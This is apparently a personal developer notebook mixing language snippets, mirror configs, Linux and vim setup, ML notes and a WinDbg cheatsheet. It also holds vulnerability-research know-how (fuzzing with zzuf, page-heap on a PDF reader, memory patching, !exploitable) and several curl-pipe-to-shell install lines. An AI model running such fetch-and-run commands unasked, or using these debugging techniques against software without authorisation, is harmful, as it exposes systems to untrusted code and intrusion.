Lan
how to write test
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_123() {
// ...
}
}
#[test]
fn test_123() {
// ...
}
string to int
Atoi (string to int) and Itoa (int to string).
i, err := strconv.Atoi("-42")
s := strconv.Itoa(-42)
go build x86 on x64
GOARCH=386 GOOS=windows go build
run direct | python main.py
import sys
def main():
filepath = sys.argv[1]
if __name__ == '__main__':
main()
md5
import hashlib
def md5(fname):
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
file
outF = open("myOutFile.txt", "w") # write (create new)
outF = open("myOutFile.txt", "a") # append
# write
outF.write("abc")
outF.write("\n")
outF.writelines(["aa","bb"]) # 写很多行
# read
outF.read(1024) # read 1024 bytes
outF.read() # read all
outF.readlines() # TODO
# read line by line
for cnt, line in enumerate(fp):
print("Line {}: {}".format(cnt, line))
# close to clean up
outF.close() # need to close
# use context open
with open(out_filename, 'w') as out_file:
out_file.write("xx")
error
try:
print("Hello")
except NameError:
print("Variable x is not defined")
except:
print("Something else went wrong")
else:
print("Nothing went wrong")
finally:
print("The 'try except' is finished")
dir (directory)
import os
for dir in os.listdir():
pass
subcommand
一个运行命令的「框架」,带超时,同时捕获 stdout and stderr
subcommand.run的第一个参数必须是数组- timeout单位是秒
- stdout=PIPE, stderr=STDOUT的作用是把stderr重定向到stdout,stdout可以通过后续拿到
import os
import subprocess
from subprocess import *
for line in outfile:
try:
i = i+1
print("runing#{} {}".format(i,line))
sr = subprocess.run(["rabin2", "-I", line[:-1]], timeout=4, stdout=PIPE, stderr=STDOUT)
print(sr.stdout.decode("utf-8"))
except subprocess.TimeoutExpired:
print("timeout")
except:
print("unknow error")
python2 subprocess
https://stackoverflow.com/a/4760517
期望信息:stdout,stderr,status
import subprocess
p = subprocess.Popen(['ls', '-a'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = p.communicate()
status = p.returncode
build from cli
打开 visual studio prompt
csc a.cs
using System;
namespace HelloWorldApplication
{
class HelloWorld
{
static void Main(string[] args)
{
Console.WriteLine("Hello World");
Console.ReadKey();
}
}
}
fmt format string
string.Format("blabla: {0}", 123);
string.Format("blabla: {0:d}", 123);
switch
switch (somevar)
{
case 123:
// do something
// do more, no need bracket
break;
case 456:
case 457:
break;
default:
break;
}
file
// read file
string content = File.ReadAllText(path, Encoding.UTF8);
// write file
File.WriteAllText(curFile, "blabla");
other
frequently
pip
-i https://pypi.douban.com/simple/
-i https://pypi.tuna.tsinghua.edu.cn/simple
go
启用 Go Modules 功能
go env -w GO111MODULE=on
七牛
go env -w GOPROXY=https://goproxy.cn,direct
阿里云
go env -w GOPROXY=https://mirrors.aliyun.com/goproxy/,direct
goproxy
go env -w GOPROXY=https://goproxy.io,direct
查看:
go env | grep GOPROXY
安装:
curl https://dl.google.com/go/go1.23.4.linux-amd64.tar.gz -O
sudo rm -rf /usr/local/go && sudo tar -C /usr/local -xzf go1.23.4.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
npm
--registry=https://registry.npm.taobao.org
cargo
在 $HOME/.cargo/config 中添加如下内容:
# ~/.cargo/config
[source.crates-io]
replace-with = 'rsproxy-sparse'
[source.rsproxy]
registry = "https://rsproxy.cn/crates.io-index"
[source.rsproxy-sparse]
registry = "sparse+https://rsproxy.cn/index/"
[registries.rsproxy]
index = "https://rsproxy.cn/crates.io-index"
[net]
git-fetch-with-cli = true
或者:
[source.crates-io]
replace-with = 'ustc'
# 如果所处的环境中不允许使用 git 协议,可以把上述地址改为:
[source.ustc]
registry = "https://mirrors.ustc.edu.cn/crates.io-index"
# registry = "git://mirrors.ustc.edu.cn/crates.io-index"
install docker
curl -fsSL https://get.docker.com | bash -s docker
rustup (install rust)
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
使用代理:
export RUSTUP_DIST_SERVER="https://rsproxy.cn"
export RUSTUP_UPDATE_ROOT="https://rsproxy.cn/rustup"
curl --proto '=https' --tlsv1.2 -sSf https://rsproxy.cn/rustup-init.sh | sh
nvm
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.2/install.sh | bash
ubuntu
git
git log -p main.c看单个文件的git历史记录
kde部分应用中文输入
使用 Fcitx 之前,您必须先设置一些环境设定变量:
如果您用 KDM, GDM, LightDM 等显示管理器,请在 ~/.xprofile 中加入以下代码;如果您用 startx 或者 Slim 启动,即使用 .xinitrc 的场合,则改在 ~/.xinitrc 中加入:
export GTK_IM_MODULE=fcitx
export QT_IM_MODULE=fcitx
export XMODIFIERS="@im=fcitx"
http://newstart.farbox.com/post/articles/fcitx
mysql
https://wiki.archlinux.org/index.php/MariaDB
已经设置了一个用户kk
MariaDB [xxx]> GRANT ALL ON xxx.* TO 'kk'@'127.0.0.1' IDENTIFIED BY 'sss' WITH GRANT OPTION;
kde shortcut
C-: choise pasteboard history
wireguard
配置文件放在 /etc/wireguard/wg0.conf 里面
使用 wg-quick up wg0 来启用 Interface, 使用 wg-quick down wg0 来关闭。
使用 systemctl enable wg-quick@wg0 来自动启动。
route: how to use two card (not worked)
route add -net 192.168.62.0 netmask 255.255.255.0 gw 192.168.1.1
route add -net 10.10.40.0 netmask 255.255.255.0 gw 10.10.30.1
http://10.10.40.11
10.10.30.164
wlp0s20f0u11
ip route add 10.10.40.0/24 via 10.10.30.164 dev wlp0s20f0u11
# ok
~/w/tmp [2]> sudo ip route del default via 192.168.0.1
[sudo] xx 的密码:
~/w/tmp> ping 10.10.40.11
PING 10.10.40.11 (10.10.40.11) 56(84) bytes of data.
sudo ip route add 10.10.40.0/24 via 10.10.30.254 dev wlp0s20f0u11
yay cache
err: HTTP server doesn't seem to support byte ranges. Cannot resume 忽略缓存下载: 在询问clean build的时候选择ALL
==> Packages to cleanBuild?
==> [N]one [A]ll [Ab]ort [I]nstalled [No]tInstalled or (1 2 3, 1-3, ^4)
==>
firefox
change scroll bar to left
- input
about:configin address bar - search and change
layout.scrollbar.sideto 3 - restart(must?)
vnc
black screen use the default config
https://www.reddit.com/r/ManjaroLinux/comments/g7vs5i/black_screen_when_i_vnc_into_manjaro_guest_kde/
Deleted everything in the ~/.vnc/xstartup file and added
dbus-launch startplasma-x11
vncserver -geometry 1600x1200 -randr 1600x1200,1440x900,1024x768
xrandr
xrandr -s 800x600
bash
循环做事
#TLDR
for i in {1..10}; do echo "abc"; done;
# example
for i in {1000..3000}; do for f in example.*; do zzuf -r 0.01 -s $i < "$f" > "$i-$f"; done; done
stdout and stderr pipe to both terminal and file
sh any.sh 2>&1 | tee output.txt
sh any.sh 2>&1 | tee -a output.txt
上次命令的返回状态
echo $?
vim
basic settings
限制最大列数
:set colorcolumn=80
python tabs
set expandtab " enter spaces when tab is pressed
set textwidth=120 " break lines when line length increases
set tabstop=4 " use 4 spaces to represent tab
set softtabstop=4
set shiftwidth=4 " number of spaces to use for auto indent
set autoindent " copy indent from current line when starting a new line
" make backspaces more powerfull
set backspace=indent,eol,start
vim-plug
install
curl -fLo ~/.vim/autoload/plug.vim --create-dirs \
https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim
config
call plug#begin('~/.vim/plugged')
Plug 'scrooloose/nerdtree', { 'on': 'NERDTreeToggle' }
call plug#end()
then :source % and :PlugInstall
coc.nvim
install node
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.37.2/install.sh | bash
nvm install 11
edit ~/.vimrc
Plug 'neoclide/coc.nvim', {'branch': 'release'}
:PlugInstall
edit ~/.vimrc
" GoTo code navigation.
nmap <silent> gd <Plug>(coc-definition)
nmap <silent> gy <Plug>(coc-type-definition)
nmap <silent> gi <Plug>(coc-implementation)
nmap <silent> gr <Plug>(coc-references)
" Use K to show documentation in preview window.
nnoremap <silent> K :call <SID>show_documentation()<CR>
function! s:show_documentation()
if (index(['vim','help'], &filetype) >= 0)
execute 'h '.expand('<cword>')
elseif (coc#rpc#ready())
call CocActionAsync('doHover')
else
execute '!' . &keywordprg . " " . expand('<cword>')
endif
endfunction
C/C++
apt install ccls
edit config file via :CocConfig
{
"languageserver": {
"ccls": {
"command": "ccls",
"filetypes": ["c", "cpp", "cuda", "objc", "objcpp"],
"rootPatterns": [".ccls-root", "compile_commands.json"],
"initializationOptions": {
"cache": {
"directory": ".ccls-cache"
},
"client": {
"snippetSupport": true
}
}
}
}
}

Q: 如何修改内存?
这里的d是修改的宽度
ed 0xe750f50 42424242
Q: ghidra rebase program
To rebase a binary in Ghidra via the GUI: Window -> Memory Map -> Set Image Base button (far right house icon). https://twitter.com/_argp/status/1167359147211251713
Q: ghidra 高亮变量
鼠标中键 https://github.com/NationalSecurityAgency/ghidra/issues/25
Q: 搜索内存:
0:013> s -a 0 L?80000000 "defines Annotatio" 0ac44ce3 64 65 66 69 6e 65 73 20-41 6e 6e 6f 74 61 74 69 defines Annotati 0e63a0e2 64 65 66 69 6e 65 73 20-41 6e 6e 6f 74 61 74 69 defines Annotati 0e90414c 64 65 66 69 6e 65 73 20-41 6e 6e 6f 74 61 74 69 defines Annotati
Q: gflags
"D:\Windows Kits\10\Debuggers\x86\gflags.exe" -i FoxitPDFReader.exe +hpa
实验:在win10上,搜索内存反查,失败,heap指令不生效就算用老版+hpa也不行
Q: 格式化打印
.printf "filename: %mu \n", poi(@esp+4)
- 宽字符串 %mu
- 字符串 %ma
和断点结合,需要对冒号和反斜杠进行转义
bp kernel32!CreateFileW ".printf "filename: %mu \n", poi(@esp+4);kv;gc;"
Q: 条件断点之字符串
实例:打开某个特定文件名时断下
bp kernel32!CreateFileW "as /mu $FileName poi(@esp+0x4);.block{r @$t0=$scmp(@\"$FileName\", @\"G:\\clean\\2023-07\\2023-07-21-mesos\\mesos-master\\links_highlights_annots.pdf\");.if(0!=@$t0){gc;}}"
Q: 使用 drrun.exe 收集
G:\clean\2023-07\2023-07-cov-ghidra>D:\working\wafl-play\DynamoRIO-Windows-8.0.18752\bin64\drrun.exe -t drcov -- test_cov.exe
Q: 显示某个地址对应的函数
0:000> uf 751318fc
KERNEL32!_imp__SleepEx:
751318fc 40 inc eax
751318fd c3 ret
0:000> uf 751318fd
KERNEL32!_imp__SleepEx+0x1:
751318fd c3 ret
gpt的推理、训练、fine-tuning分别是什么意思
The terms "inference," "training," and "fine-tuning" are fundamental concepts in the field of machine learning and natural language processing. Here's a detailed explanation of each term:
术语“推理”、“训练”和“微调”是机器学习和自然语言处理领域的基本概念。 以下是每个术语的详细解释:
推理: 含义: 推理是指使用经过训练的模型根据新的输入数据进行预测或生成输出的过程。 当模型被部署并用于执行回答问题、完成提示或生成文本等任务时,它正在参与推理。 示例: 使用 GPT-3 等预先训练的语言模型来生成类似人类的文本来响应给定的提示,这就是推理的一个示例。
训练: 含义: 训练涉及通过向机器学习模型提供大量标记数据并允许其学习数据中的模式和关系来教授机器学习模型的过程。 该模型在训练期间调整其内部参数,以最小化其预测与训练数据中的实际标签之间的差异。 示例: 在文本段落数据集上训练语言模型,以学习人类语言的统计模式和结构。
微调: 含义: 微调,也称为迁移学习,涉及采用预先训练的模型并在特定数据集或任务上对其进行进一步训练,以使其适应新领域或提高其在特定类型数据上的性能。 示例: 在包含火星城市信息的数据集上微调 GPT-3 等预训练语言模型,使其能够针对有关火星城市的问题生成准确且相关的答案。
https://devv.ai/en/search?threadId=d669udyldpmo
LoRA
quantization (量化)
context: You can run 70B LLAMA on dual 4090s/3090s with quantization.
context 2: No, they can't run it. llama 70 with 4 bit quantization takes ~50 GB VRAM for decent enough context size. You need A100, or 2-3 V100 or 4 3090 which all costs roughly roughly $3-5/h
GGML 和 GGUF
GGML 是创建用于存储 GPT 模型的文件格式的早期尝试。
GGUF 旨在解决 GGML 的局限性并改善整体用户体验。
GGUF是一种二进制格式,旨在实现快速加载和保存大语言模型,并易于阅读。原来模型是用pytorch保存, 我有的时候也转换成onnx. 但是,想在LLAMA.CPP上跑, 就要用GGUF格式.
Use cases
fine-tune
https://github.com/brevdev/notebooks/blob/main/llama2-finetune-own-data.ipynb 一些notebook实践
https://news.ycombinator.com/item?id=37484135 精读
hardware
是的,3090 是当地人工智能社区的一个模因。 此外,支持也令人惊叹,因为它的架构与 A100 基本相同。
3060 也很受欢迎,它是 3090 的一半。
https://news.ycombinator.com/item?id=38589520
George Hotz | Programming | Mistral mixtral on a tinybox | AMD P2P multi-GPU mixtral-8x7b-32kseqlen 1:24:11 / 2:37:51
llama
git clone --depth=1 https://github.com/ggerganov/llama.cpp
cd llama.cpp/
make
Q:/Downloads/ai/llama.cpp $ ./main.exe -m "Q:\Downloads\mistral-7b-instruct-v0.1.Q4_K_M.gguf" -p "golang and zig" -n 400 -e
SGD
提供一种 SGD 方法,该方法 实现随机梯度下降
sophisticated algorithm ≤ simple learning algorithm + good training data.
>>> import mnist_loader
>>> training_data, validation_data, test_data = mnist_loader.load_data_wrapper()
>>> import network
>>> net = network.Network([784, 30, 10])
>>> net.SGD(training_data, 30, 10, 3.0, test_data=test_data)
Epoch 0: 9058 / 10000, took 8.89 seconds
Epoch 1: 9197 / 10000, took 8.88 seconds
反向传播算法
反向传播算法最初是在 20 世纪 70 年代引入的, 但直到 著名的 1986 年 论文 大卫 鲁梅尔哈特 _ 杰弗里 辛顿 ,和 罗纳德 威廉姆斯 。 该论文描述了几个 反向传播比以前快得多的神经网络 学习方法,使得使用神经网络来解决问题成为可能 以前无法解决的问题。 今天, 反向传播算法是神经网络学习的主力 网络。
反向传播算法是神经网络训练的关键步骤,通过该算法可以有效地调整神经网络的参数(权重和偏置),以使其逼近期望的输出。该算法的工作原理可以简单概括如下:
前向传播:首先,通过神经网络的前向传播,将输入数据从输入层经过隐藏层传播到输出层,得到模型的预测输出。
计算损失:将模型的预测输出与实际期望输出进行比较,计算损失函数(cost function)(如均方误差或交叉熵(cross-entopy)),用于衡量模型预测的准确程度。
反向传播:根据损失函数,利用链式法则计算损失函数对神经网络中各层参数(权重和偏置)的梯度。这些梯度表示了损失函数对参数的变化敏感程度。
参数更新:根据梯度下降算法,通过不断迭代,以最小化损失函数为目标,逐步调整神经网络中的参数,使得模型的预测输出逐渐逼近期望输出。
反向传播算法的关键在于通过计算损失函数对参数的梯度,实现了对神经网络参数的自动调整,从而提高了神经网络的准确性和泛化能力。
an: 增加了负反馈调节
过拟合
过拟合是指机器学习模型在训练数据上表现良好,但在新数据上表现不佳的不良行为。这种情况发生时,模型会过于复杂,以至于记住了训练数据中的噪音和随机波动,而无法很好地泛化到新的数据集上。过拟合通常是由于训练数据量太小、包含大量无关信息、训练时间过长或模型复杂度过高等原因引起的。
为了检测过拟合,可以使用K折交叉验证等方法。K折交叉验证将训练集等分成K个子集,然后进行K次迭代训练和验证,最终得到模型的平均性能评估。
为了避免过拟合,可以采取一些方法,比如提前停止训练、增加训练数据、数据增强、特征选择、正则化和集成学习等。这些方法有助于降低模型的复杂度,减少噪音的影响,从而提高模型的泛化能力。
an: 原因:前摇过长。 解决方法:尽早引入考试和验证,及时纠错
避免过拟合:Regularization 正则化
Regularization是机器学习中用来避免过拟合的一种技术。过拟合指的是模型在训练数据上表现良好,但在新数据上表现不佳的情况。Regularization通过对模型的复杂度进行惩罚,来防止模型学习训练数据中的噪声,从而提高模型的泛化能力。
在Regularization中,有两种常见的方法:Ridge Regression和Lasso Regression。Ridge Regression通过向损失函数中添加一个收缩量来修改残差平方和,从而对模型的灵活性进行惩罚。而Lasso Regression则使用绝对值的惩罚来限制模型的复杂度。
这些Regularization技术有助于减少模型的方差,提高模型的泛化能力,而不会显著增加模型的偏差。通过调整Regularization的参数,可以控制对模型偏差和方差的影响,从而在避免过拟合的同时保持模型的重要特性。
除了Ridge Regression和Lasso Regression,Regularization还可以应用于稀疏性正则化、半监督学习和多任务学习等领域。这些Regularization技术的应用有助于提高模型的稳定性和泛化能力,是机器学习中重要的技术手段之一。
an: 减少模型的复杂性
评分函数(score function)和损失函数(loss function)
概述。我们现在将开发一种更强大的图像分类方法,最终将自然地扩展到整个神经网络和卷积神经网络。该方法将有两个主要组成部分:将原始数据映射到类别分数的分数函数(score function),以及量化预测分数和真实标签之间的一致性的损失函数(loss function)。然后,我们将其视为一个优化问题,目标是更新score function的参数来最小化loss function
gpu choice
RTX 2070 https://www.thepaper.cn/newsDetail_forward_22138632
3080和4070Ti https://timdettmers.com/2018/12/16/deep-learning-hardware-guide/
Adam
https://github.com/kartik4949/tinygrad/commit/26ce2d93c3b8da2eed3ed0620212628e7dcfc459
George Hotz | Programming | tinygrad and more neural networks from scratch | Part1 直播: https://www.youtube.com/watch?v=Xtws3-Pk69o 35:51
Adam是一种 优化算法 ,用于更新神经网络权重。它是一种替代传统随机梯度下降程序的优化算法。Adam算法是由OpenAI的Diederik Kingma和多伦多大学的Jimmy Ba在2015年的ICLR论文中提出的。Adam算法的名称源自自适应矩估计(adaptive moment estimation)。Adam算法的优点包括易于实现、计算效率高、内存需求低、适用于大规模数据和参数、适用于非平稳目标、适用于梯度非常嘈杂或稀疏的问题。Adam算法与传统的随机梯度下降不同,它维护每个网络权重的学习率,并在学习过程中分别进行调整。Adam算法结合了AdaGrad和RMSProp的优点,通过计算梯度的一阶矩和二阶矩的指数移动平均值来计算不同参数的自适应学习率。Adam算法在实践中表现良好,与其他随机优化方法相比效果显著。在深度学习领域,Adam算法被广泛应用,并被推荐作为默认的优化方法。
Dropout
https://github.com/tinygrad/tinygrad/commit/d901ef6b23f76205ad8d47679b75dd0342ef7626 引入tinygrad (Dec 13, 2020)
https://www.cs.toronto.edu/~rsalakhu/papers/srivastava14a.pdf p5 算法
Bernoulli random 0-1随机
Dropout是一种用于深度学习神经网络的正则化方法。在训练过程中,Dropout会随机丢弃神经网络中的一些节点,以防止过拟合。过拟合是指模型在训练数据上表现良好,但在测试数据上表现不佳的情况。Dropout通过随机丢弃节点,使得每次训练时网络的结构都不同,从而增加了模型的鲁棒性,减少了过拟合的风险。
在实践中,Dropout可以通过在每个隐藏层中随机丢弃一定比例的节点来实现。这样做可以使得网络在训练过程中变得更加嘈杂,迫使每个节点以概率性的方式承担更多或更少的输入责任。这种概念表明,Dropout可以打破网络层之间的相互适应,从而使模型更加健壮。
在使用Dropout时,需要设置一个丢弃概率,用于指定在训练过程中丢弃节点的概率。通常情况下,对于隐藏层的节点,丢弃概率可以选择0.5,而对于输入层的节点,通常会选择接近1的概率。在训练结束后,需要对网络的权重进行重新缩放,以便在进行预测时能够得到正确的结果。
总的来说,Dropout是一种简单而有效的正则化方法,可以帮助减少过拟合,提高深度神经网络的泛化能力。
generate from exist table
python manage.py inspectdb <tbl_name>... > models.py
mysql support issue
django.db.utils.NotSupportedError: MySQL 8.0.11 or later is required (found 5.7.20).
for old mysql version, use django4.1
pip3 install django==4.1
mysql lib error on centos
rpm --import https://repo.mysql.com/RPM-GPG-KEY-mysql-2022 yum -y install mysql-devel pip install mysqlclient -i https://pypi.douban.com/simple/ export LD_LIBRARY_PATH=/usr/lib64/mysql/
中文字体:https://github.com/lxgw/LxgwWenKai-Lite/releases
英文字体:Jetbrains Mono
security
WinDbg cheatsheet
origin link: https://github.com/hugsy/defcon_27_windbg_workshop/blob/master/windbg_cheatsheet.md
Content
- WinDbg cheatsheet
Setup
Symbol Path
In a command prompt:
C:\> setx _NT_SYMBOL_PATH srv*C:\Symbols*https://msdl.microsoft.com/download/symbols
In WinDbg, Ctrl+S then
srv*C:\Symbols*https://msdl.microsoft.com/download/symbols
Providers
In WinDbg
0:000> .scriptproviders
Should display something like
Available Script Providers:
NatVis (extension '.NatVis')
JavaScript (extension '.js')
VS Code linting
Download JsProvider.d.ts to the root of your script and add the following at its top:
/// <reference path="JSProvider.d.ts" />
"use strict";
Kernel Debugging
- Increase the kernel verbosity level from calls to
KdPrintEx()- temporarily during runtime from WinDbg (lost once session is closed)
kd> ed nt!Kd_Default_Mask 0xf
- permanently from registry hive (in Admin prompt on Debuggee)
C:\> reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter" /v DEFAULT /t REG_DWORD /d 0xf
Commands
Basic commands
| Action | Command | Examples |
|---|---|---|
| Help / Manual | .hh <command> | .hh .hh !process |
| Clear screen | .cls | |
| Dynamic evaluation | ? | ? 40004141 – nt ? 2 + 2 ? nt!ObTypeArrayIndex |
| Comment | $$ | $$ this is a useful comment |
| Print a string | .echo | .echo "Hello world" |
| Print a formatted string (see printf formatters) | .printf | .printf "Hello %ma\n" , @$esp |
| Command separator | ; | command1 ; command2 |
| Attach (Detach) to (from) process | .attach | .detach |
| Display parameter value under different formats (hexadcimal, decimal, octal) | .formats | .formats 0x42 |
| Change default base | n | n 8 |
| Quit WinDbg (will kill the process if not detached) | q | |
| Restart debugging session | .restart | |
| Reboot system (KD) | .reboot |
.printf formatters
| Description | Formatter | Examples |
|---|---|---|
| ASCII C string (i.e. NULL terminated) | %ma | |
| Wide C string (i.e. NULL terminated) | %mu | |
| UNICODE_STRING** string | %msu | |
| Print the symbol pointed by address | %y | .printf “%y\n”,ffff8009bc2010 // returns nt!PsLoadedModuleList |
| Print a Pointer | %p | .printf “%p\n”,nt!PsLoadedModuleList // returns 0xffff8009bc2010 |
Execution flow
| Action | Command | Examples |
|---|---|---|
| Start or resume execution (go) | g | |
| Dump register(s) | r | r r eax r rax=42 |
| Step over | p | pa 0xaddr (step over until 0xaddr is reached) pt (step over until return) pc (step over until next call) |
| Step into | t | Same as above, replace p with t |
| Execute until reaching current frame return address (go upper) | gu | |
| List module(s) | lm | lm (UM: display all modules) lm (KM: display all drivers and sections) lm m *MOD* (show module with pattern 'MOD' ) |
| Get information about current debugging status | .lastevent!analyze | |
| Show stack call | kkp |
Registers / Memory access
| Action | Command | Examples |
|---|---|---|
| Read memory As | bytes: dbword: dwdword: ddqword: dqpointer: dpunicode string: dW | db @sp 41 41 41 41dw @ripdd @rax l4dyb @ripdps @espdW @rsp |
| Write memory As | bytes: ebword: ewdword: edqword: eqascii string: eaUnicode string: eu | ea @pc "AAAA" |
| Read register(s) | rr [[REG0],REG1,...] | r rax,rbp |
| Write register(s) | r [REG]=[VALUE] | r rip=4141414141414141 |
| Show register(s) modified by the current instruction | r. | |
| Dump memory to file | .writemem | .writemem C:\mem.raw @eip l1000 |
| Load memory from file | .readmem | .readmem C:\mem.raw @rip l1000 |
| Dump MZ/PE header info | !dh | !dh kernel32!dh @rax |
| Read / write physical memory (syntax similar to dX/eX commands) | !db / !eb !dw / !ew !dd / !ed !dq / !eq | |
| Fill / Compare memory | fc | f @rsp l8 41c @rsp l8 @rip |
| Dereference memory | poi(<AddrOrSymbol>): dereference pointer sizedwo(): dereference DWORDqwo(): dereference QWORD | db poi( @$rax ) |
Memory search
| Action | Command | Examples |
|---|---|---|
| Search | byte: s [RANGE] [VALUE]dword: s -d [RANGE] [DWORD_VALUE] | s @eip @eip+100 90 90 90 ccs -d @eax l100 41424344 |
| Search ASCII (Unicode) | s –a <AddrStart> L<NbByte> "Pattern"s –a <AddrStart> <AddrEnd> "Pattern"(for Unicode – change –a with –u) | |
| Search for pattern in command | .shell | .shell -ci "<windbg command>" batch command.shell -ci "!address" findstr PAGE_EXECUTE_READWRITE |
Breakpoints
| Action | Command | Examples |
|---|---|---|
| Examine | x | x nt!*CreateProcess* |
| Display types | dt | dt ntdll!_PEB @$pebdt ntdll!_TEB –r @$teb |
| Display Type Extended - with Debugger Object Model | dtx | dtx nt!_PEB 0x000008614a7a000which is equivalent to dx (nt!_PEB*)0x000008614a7a000 |
| Set breakpoint | bp bp 0xaddr (or mod!symbol) | |
| List breakpoints | bl | |
| Disable breakpoint(s) | bd [IDX] (IDX is returned by bl) | bd 1bd * |
| Delete breakpoint(s) | bc [IDX] (IDX is returned by bl) | bc 0bc * |
| (Un)Set exception on event | sx | sxe ld mydll.dll |
| Break on memory access | ba | ba r 4 @esp |
| Define breakpoint command | bp … [Command]Where [Command] can be - an action: " r ; g"- a condition: " .if (@$rax == 1) {.printf \"rcx=%p\\\n\", @rcx }" | bp kernel32!CreateFileA "da @rcx; g" " |
| Enable breakpoint after N hit(s) | bp <address> N+1 | bp /1 0xaddr (temporary breakpoint)bp 0xaddr 7 (disable after 6 hits) |
| Set "undefined" breakpoint | bu <address> |
Symbols
| Action | Command | Examples |
|---|---|---|
| Examine | x | x /t /v ntdll!*CreateProcess* |
| Display types | dt | dt ntdll!_PEB @$peb |
| List nearest symbols | ln | ln 0xaddr |
| Set/update symbol path | .sympath | |
| Load module symbols | ld | ld Moduleld * |
Convenience variables and functions
| Action | Command | Examples |
|---|---|---|
| Program entry point | $exentry | bp $exentry |
| Process Environment Block | $peb | dt _PEB @$peb |
| Thread Environment Block | $teb | dt _TEB @$teb |
| Return Address | $ra | g @ra |
| Instruction Pointer | $ip | |
| Size of Page | $pagesize | |
| Size of Pointer | $ptrsize | |
| Process ID | $tpid | |
| Thread ID | $tid |
Useful extensions
| Action | Command | Examples |
|---|---|---|
| Detailed information about loaded DLLs | !dlls!dlls -I (show load order)!dlls -c 0xaddr (show DLL containing0xaddr) | |
| Get mapping information | !address | !address -f:MEM_COMMIT |
| Change verbosity of symbol loader | !sym | !sym noisy!sym quiet |
| Dump PEB/TEB information | !peb !teb | |
| Analyze the reason of a crash | !analyze | !analyze -v |
| Convert an NTSTATUS code to text | !error | !error c0000048 |
| Perform heuristic checks to the exploitability of a bug | !exploitable | |
| Encode/decode pointer encoded by KernelBase API EncodePointer() | !encodeptr32 (or 64)!decodeptr32 (or 64) | |
| Display the current exception handler | !exchain | |
| Dump UM heap information | !heap |
.NET Debugging
| Action | Command | Examples |
|---|---|---|
| Load the CLR extensions | .loadby sos clr | sxe ld clr; g to make sure clr.dll is loaded, then .loadby sos clr |
| Get help | !help | |
| Set managed code breakpoint | !bpmd <module> Path.To.Function | !bpmd mscorlib.dll System.Reflection.Assembly.Load !bpmd System.dll System.Diagnostics.Process.Start !bpmd System.dll System.Net.WebClient.DownloadFile |
| List all managed code breakpoints | !bpmd -list | |
| Clear specific managed code breakpoint | !bpmd -clear $BreakpointNumber | |
| Clear all managed code breakpoints | !bpmd -clearall | |
| Dump objects | !DumpObj | !DumpObj /d 0x<address> |
| Dump the .NET stack | !CLRStack | !CLRStack -p |
LINQ & Debugger Data Model
Variables
| Variable description | Command | Examples |
|---|---|---|
| Create a variable | dx @$myVar = VALUE | dx @$ps = @$cursession.Processes |
| Delete a variable | dx @$vars.Remove("VarName") | dx @$vars.Remove("ps") |
| List user defined variable | dx @$vars dx Debugger.State.UserVariables | |
Bind address Address to a N-entry array of type T | dx (T* [N])0xAddress | dx (void** [5]) Debugger.State.PseudoRegisters.General.csp |
Functions
| Function description | Command | Examples |
|---|---|---|
| Create a "lambda" inline function | dx @$my_function = ([arg0, arg1] => Code) | dx @$add = (x, y => x + y) |
| Filtering objects | [Object].Where( [FILTER PATTERN] ) | dx @$cursession.Processes.Where( x => x.Name == "notepad.exe") |
| Sorting objects | - asc: [Object].OrderBy([Sort Expression])- desc: [Object].OrderByDescending([Sort Expression]) | dx @$cursession.Processes.OrderByDescending(x => x.KernelObject.UniqueProcessId) |
| Projecting | .Select( [PROJECTION KEYS] ) | .Select( p => new { Item1 = p.Name, Item2 = p.Id } ) |
Access n-th element of iterable | $Object[n] | @$cursession.Processes[4] |
Get the number of objects in iterable | $Object.Count() | @$cursession.Processes.Count() |
Create a iterator from a LIST_ENTRY structure | dx Debugger.Utility.Collections.FromListEntry(Address, TypeAsString, "TypeMemberNameAsString") | dx @$ProcessList = Debugger.Utility.Collections.FromListEntry( *(nt!_LIST_ENTRY*)&(nt!PsActiveProcessHead), "nt!_EPROCESS", "ActiveProcessLinks") dx @$HandleList = Debugger.Utility.Collections.FromListEntry( *(nt!_LIST_ENTRY*)&(nt!PspCidTable), "nt!_HANDLE_TABLE", "HandleTableList") |
Apply a structure S to memory (dt-like) | dx (S*)0xAddress | dx (nt!_EPROCESS*)&@$curprocess.KernelObject |
| Format output data | dx <LinqObject>.ToDisplayString($format) where $format can be
| dx @$peb->ProcessParameters->ImagePathName.Buffer.ToDisplayString("su" |
WinDbg JavaScript reference
| Action | Command | Examples |
|---|---|---|
| Print message | host.diagnostics.debugLog(Message) | |
| Read data from memory | host.memory.readMemoryValues(0xAddr, Length) | |
| Read string from memory | host.memory.readString(0xAddr)host.memory.readWideString(0xAddr) | |
| Evaluate expression | host.evaluateExpression([EXPR]) | var res=host.evaluateExpression("sizeof(_LIST_ENTRY)")dx @$scriptContents.host.evaluateExpression("sizeof(_LIST_ENTRY)") |
| Resolve symbol | host.getModuleSymbolAddress(mod, sym) | var pRtlAllocateHeap = host.getModuleSymbolAddress('ntdll', 'RtlAllocateHeap'); |
| Dereference a pointer as an object | host.createPointerObject(...).dereference() | var pPsLoadedModuleHead = host.createPointerObject(host.getModuleSymbolAddress("nt", "PsLoadedModuleList"), "nt", "_LIST_ENTRY *"); |
| Create typed variable from address | host.createTypedObject(addr, module, symbol) | var loader_data_entry = host.createTypedObject(0xAddress,"nt","_LDR_DATA_TABLE_ENTRY") |
| Dereference memory | host.evaluateExpression('(int*)0xADDRESS').dereference() | |
| Get access to the Pseudo-Registers | host.namespace.Debugger.State.PseudoRegisters | var entrypoint = host.namespace.Debugger.State.PseudoRegisters.General.exentry.address; |
| Execute WinDbg command | host.namespace.Debugger.Utility.Control.ExecuteCommand | var modules=host.namespace.Debugger.Utility.Control.ExecuteCommand("lm"); |
| Set Breakpoint | host.namespace.Debugger.Utility.Control.SetBreakpointAtSourceLocationhost.namespace.Debugger.Utility.Control.SetBreakpointAtOffsethost.namespace.Debugger.Utility.Control.SetBreakpointForReadWrite | |
